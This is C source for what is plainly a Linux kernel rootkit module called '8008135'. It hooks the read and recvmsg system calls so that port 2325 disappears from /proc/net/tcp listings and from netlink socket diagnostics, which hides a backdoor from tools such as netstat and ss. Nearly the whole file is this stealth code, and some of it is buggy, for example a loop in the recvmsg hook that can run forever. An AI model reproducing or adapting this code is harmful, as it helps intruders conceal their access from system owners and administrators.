/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
/*
 * main.c
 * Copyright (C) 2019
 *
 * 8008135 is free software: you can redistribute it and/or modify it
 * under the terms of the GNU General Public License as published by the
 * Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * 8008135 is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 * See the GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License along
 * with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

/*******************************************************************************/

/**** includes *****************************************************************
*******************************************************************************/
#include "h1d3p0r7.h"

/**** var **********************************************************************
*******************************************************************************/

sys_read_ptr sys_read_orig;
original_recvmsg_syscall sys_recvmsg_orig;

/*******************************************************************************/

/***  FUNCTION  ****************************************************************
*          NAME:  hide port
*   DESCRIPTION:  hides the port 2325
*    PARAMETERS:  -
*       RETURNS:
*******************************************************************************/

asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
                              size_t count)
{
	long result, bp, diff_in_bytes;
	char *kbuf, *start_line, *end_line, *port_num;
	char *pathname, pbuf[256];
	struct files_struct *current_files;
	struct fdtable *files_table;
	struct path file_path;

	// run real read
	result = (*sys_read_orig)(fd, buf, count);

	if (result <= 0){
		return result;
	}


	current_files = current->files;
	files_table = files_fdtable(current_files);

	file_path = files_table->fd[fd]->f_path;
	pathname = d_path(&file_path, pbuf, 256*sizeof(char));


	if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) {

		if (!access_ok(VERIFY_READ, buf, result)){
			return -1;
		}
		if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){
			return -1;
		}
		if (copy_from_user(kbuf, buf, result)){
			return -1;
		}


		start_line = strchr(kbuf, ':') - 4;
		diff_in_bytes = (start_line - kbuf) * sizeof(char);

		for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {

			start_line = kbuf + bp;
			port_num = strchr(strchr(start_line, ':') + 1, ':') + 1;
			end_line = strchr(start_line, '\n');
			diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);

			if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) {

				memmove(start_line, end_line + 1,
						result - bp - diff_in_bytes);

				result -= diff_in_bytes;
			}
		}

		// copy from kernel to userspace
		if (!access_ok(VERIFY_WRITE, buf, result)){
			return EINVAL;
		}
		if (copy_to_user(buf, kbuf, result)){
			return EINVAL;
		}
		kfree(kbuf);
	}
	// return number of bytes read
	return result;
}

/* Function that replaces the original `recvmsg` syscall. Initially, it calls the original
   `recvmsg` which fills the given msg buffer. We realize whether we are reading from a netlink
   socket with the help of some netlink utility macros. If a netlink socket is being used, we
   iterate through the inet diag msg structs (each prepended by a nlmsghdr) and compare the
   source and destination ports with our list of hidden ones. In order to hide an entry we copy
   the remaining entries over it and adjust the data length which is returned to the user. */

asmlinkage ssize_t my_recvmsg_syscall(int sockfd, struct user_msghdr __user *msg, unsigned flags)
{
	long ret;
	struct nlmsghdr *nlh;
	long count;
	int found;
	char *stream;
	int offset;
	int i;
	struct inet_diag_msg *r;
	int port;
	/* Call original `recvmsg` syscall */
	ret = sys_recvmsg_orig(sockfd, msg, flags);

	/* Some error occured. Don't do anything. */
	if (ret < 0)
		return ret;

	/* Extract netlink message header from message */
	nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base);

	/* Number of bytes remaining in message stream */
    count = ret;

	/* Set flag specifying whether message contains data to be masked */
	found = 1;

	/* NLMSG_OK: This macro will return true if a netlink message was received. It
	   essentially checks whether it's safe to parse the netlink message (if indeed
	   is a netlink message) using the other NLMSG_* macros. */
	while (NLMSG_OK(nlh, count)) {

		if (found == 0)
			/* NLMSG_NEXT: Many netlink protocols have request messages that result
			   in multiple response messages. In these cases, multiple responses will
			   be copied into the `msg` buffer. This macro can be used to walk the
			   chain of responses. Returns NULL in the event the message is the last
			   in the chain for the given buffer. */
			nlh = NLMSG_NEXT(nlh, count);
		
		r = NLMSG_DATA(nlh);
		port = ntohs(r->id.idiag_sport);
		if(port == 2325){
			/* Message contains data to be masked */
			found = 1;
		}else{
			found = 0;
			continue;
		}


		stream = (char *) nlh;

		/* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it
		   up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */
		offset = NLMSG_ALIGN((nlh)->nlmsg_len);

		/* Copy remaining entries over the data to be masked */
		for (i=0 ; i<count ; i++)
			stream[i] = stream[i + offset];

		/* Adjust the data length */
		ret -= offset;
	}

	return ret;
}

